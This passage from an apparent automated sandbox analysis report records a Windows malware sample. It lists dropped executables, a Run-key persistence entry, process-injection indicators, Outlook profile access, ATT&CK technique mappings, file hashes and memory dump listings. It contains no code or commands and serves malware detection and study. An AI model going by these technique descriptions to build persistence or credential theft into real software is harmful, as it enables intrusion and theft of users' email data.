- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1256

C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
5⤵
- Executes dropped EXE
PID:1752

C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
5⤵
- Executes dropped EXE
PID:1740

C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1624

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
C:\Users\Admin\Documents\Qtkkhrqfym.bat
MD5
57cc9b0d215088ba8b5d63024605da81

SHA1
cdc02772f2d7ecacbb86ad63e67b1726b36eafc6

SHA256
ea7db683263f7447dec974e52fe719b6ed0db751e122d53f57cdd0482d644f70

SHA512
bc087ab0e497686213f9a2a03a447009a798936ee8d80d4f652edf8974e0940a20445db82802581acf3b7865c8a00013173f55db365daf2aa31c28bd43bf04e3

Download Submit
\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
MD5
1eada844f6d267f4451b9ffa8eba6624

SHA1
11144faece06eb2b3c9c7e19ac3c170b66a351f7

SHA256
49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

SHA512
1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

Download Submit
memory/576-56-0x0000000000000000-mapping.dmp

Download
memory/1256-71-0x00000000006B0000-0x00000000006C8000-memory.dmp

Filesize
96KB

Download
memory/1256-64-0x0000000000000000-mapping.dmp

Download
memory/1256-67-0x0000000001170000-0x0000000001171000-memory.dmp

Filesize
4KB

Download
memory/1256-69-0x0000000000670000-0x00000000006A5000-memory.dmp

Filesize
212KB

Download
memory/1256-70-0x0000000004A80000-0x0000000004A81000-memory.dmp

Filesize
4KB

Download
memory/1624-78-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1624-79-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1624-87-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/1624-85-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1624-82-0x00000000004203FE-mapping.dmp

Download
memory/1624-81-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1624-77-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1624-80-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1768-54-0x0000000071731000-0x0000000071733000-memory.dmp

Filesize
8KB

Download
memory/1768-53-0x000000002F3E1000-0x000000002F3E4000-memory.dmp

Filesize
12KB

Download
memory/1768-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1768-88-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1972-58-0x0000000000000000-mapping.dmp

Download
memory/1972-59-0x0000000075821000-0x0000000075823000-memory.dmp

Filesize
8KB

Download
memory/1972-62-0x0000000002320000-0x0000000002F6A000-memory.dmp

Filesize
12.3MB

Download
memory/1972-60-0x0000000002320000-0x0000000002F6A000-memory.dmp

Filesize
12.3MB

Download
memory/1972-61-0x0000000002320000-0x0000000002F6A000-memory.dmp

Filesize
12.3MB

Download